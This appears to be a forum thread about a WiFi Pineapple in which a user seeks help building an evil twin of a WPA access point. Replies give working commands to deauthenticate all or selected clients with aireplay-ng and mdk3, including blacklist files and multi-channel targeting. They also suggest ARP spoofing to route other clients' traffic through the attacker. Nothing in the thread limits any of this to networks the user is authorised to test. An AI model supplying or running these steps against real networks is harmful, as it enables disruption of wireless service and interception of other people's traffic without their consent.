Jump to content

Attack guidance


pabo2uk

Recommended Posts

Now im a bit more comfortable with the Pineapple, I thought id explore more creative ways of spoofing APs and devices. I'm quite not sure what kind of attack this is called (I think evil twin attack- I maybe mistaken) but have followed some advice on how to pull off this particular attack. The bottom line is I cannot get it to work would like some guidance please.

Essentially I'm trying to spoof a WPA protected AP and get one of its clients connecting to my MKV rather than the AP it think its connected too.

So this is what I have done......

PART 1.

1. Log into Pineapple and change the SSID of AP to the target AP in this case Epsilon2, also set passkey of Epsilon2 - which I already know!

PART 2

1. SSH into Pineapple

2. airmon-ng start wlan1

3. airodump-ng -c 11 --bssid <00:11:22:33:44:55> wlan1 - LET THIS RUN AND WAIT FOR ANY DEVICE TO CONNECT

4. Once a device has connected i will note the devices MAC address

6. aireplay-ng -0 5 -a <00:11:22:33:44:55> -c <55:44:33:22:11:00> wlan1 - LET THIS RUN

7. I can see that the ACKS are being sent on both the AP and client

But it just dosnt work - What am I doing wrong? DO I have set to set the channel on the interface for this to work maybe?

Thanks guys

Link to comment
Share on other sites

As far as I am aware, this is incredibly difficult if not impossible to do.

If the ESSID and MAC of the pineapple match that of the AP (including the encryption, of course), then the two access points will both "compete" for the AP and will result in the client not connecting at all. It's a security feature of WPA and WEP that isn't in open networks - which is why Karma only works with open APs.

If you know the password, just connect to it in client mode and use arpspoof to route all the other client connections through you.

Link to comment
Share on other sites

Thanks for the response.

I can probably get my next question by looking on youtube, but gonna ask anyway......

I have come across arpspoofing before and have ATTEMPTED to play with it using kali Linux...... How would I go about using the commands while SSH'd into the Pineapple?? Infact what are the commands? Is there any good aprspoofing tutorials?

Thanks

Link to comment
Share on other sites

As far as I am aware, this is incredibly difficult if not impossible to do.

Maybe you are mistaking it with something else :unsure:

Step 1

Configure your AP to have exactly the same SSID ENCRYPTION and PASSKEY as the root AP BUT different channel. The channel of your AP should be at least 3 channels away from the root AP. (e.g if the root AP channel is 11 your's should be maximum 7, i would had set it as 1).

Step 2

To deauth clients from the root AP you will need a second wireless card (e.g wlan1) and use aireplay-ng or mdk3 deauth mode. I suggest mdk3. If you do not run any deauth attack use the same channel as the root AP. In this case new clients will connect to AP with better/stronger signal quality/strength and the already connected clients will stay connected to root AP.

Run this to install mdk3

opkg update
opkg install mdk3

and this to see mdk3 options

mdk3 --fullhelp

to run the deauth attack with mdk3 run:

ifconfig wlan1 down
airmon-ng start wlan1
echo {root_ap_bssid} > black.list
mdk3 {monitor_int} d -c {root_ap_channel} -b black.list

(replace {root_ap_bssid}, {monitor_int} and {root_ap channel})

If you still want to use aireplay-ng and deauth every client from the root AP run:

ifconfig wlan1 down
iwconfig wlan1 channel {root_ap_channel}
airmon-ng start wlan1
aireplay-ng -0 100 -a {root_ap_bssid} {monitor_int}

(replace {root_ap_channel}, {root_ap_bssid} and {monitor_int})

Else if you want to deaut only one client run:

ifconfig wlan1 down
iwconfig wlan1 channel {root_ap_channel}
airmon-ng start wlan1
aireplay-ng -0 100 -a {root_ap_bssid} -c {client_bssid} {monitor_int}

(replace {root_ap_channel}, {root_ap_bssid}, {client_bssid} and {monitor_int})

Edited by KiatoGS
Link to comment
Share on other sites

Thanks for the very informative response - I shall definitely give this a bash and let you know the results.

Quick question, please can you explain the difference between mdk3 and aireplay, all I know is that they are deauth tools....

Thanks

Link to comment
Share on other sites

What do you mean by add clients? Does it just overload it with fake clients causing the AP to crash? Also when you say crash is that just crashing the Wifi part of the router?! By the sound of things (im guessing) mdk3 is a better choice? Sorry for all the annoying questions, im just interested in how it all works.....

Thanks

Link to comment
Share on other sites

Thanks for all the support guys..... Just one last question... PROIMISE :)

Earlier in this thread kiatoGS kindly put down some mdk3 commands, can you just explain what the commands are doing?

echo {root_ap_bssid} > black.list

mdk3 {monitor_int} d -c {root_ap_channel} -b black.list

Thanks

Link to comment
Share on other sites

echo {root_ap_bssid} > black.list = create a file called black.list with the AP bssid

mdk3 {monitor_int} d -c {root_ap_channel} -b black.list = Run mdk3 on your monitor interface (mon0) in deauthentication mode (d) on AP channel ( -c 6 ) with the blacklist file you created above (-b)

Link to comment
Share on other sites

Thanks for all the support guys..... Just one last question... PROIMISE :)

Earlier in this thread kiatoGS kindly put down some mdk3 commands, can you just explain what the commands are doing?

echo {root_ap_bssid} > black.list

mdk3 {monitor_int} d -c {root_ap_channel} -b black.list

Thanks

echo {root_ap_bssid} > black.list = create a file called black.list with the AP bssid

mdk3 {monitor_int} d -c {root_ap_channel} -b black.list = Run mdk3 on your monitor interface (mon0) in deauthentication mode (d) on AP channel ( -c 6 ) with the blacklist file you created above (-b)

TYTecholust this is correct! I just want to add some details... At the black.list you can add as many APs as you like. The format of the file should be this:

root@kiatogs:~# cat black.list
CC:1A:FA:9F:3D:14
C1:F4:56:7A:23:35
38:22:FF:A2:65:F1
root@kiatogs:~#

If the APs you want to deauth (and their bssids are in the black.list) are on different channels you can use:

mdk3 mon0 d -c 1,6,11,13 -b black.list

This command will use interface mon0 and the mdk3 will search for the bssids that are in the black.list at the channels 1, 6, 11 and 13.

If -c parameter is not declared mdk3 will hop in all channels to find those bssids.

You can find out more by typing:

mdk3 --fullhelp

or:

man mdk3
Edited by KiatoGS
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...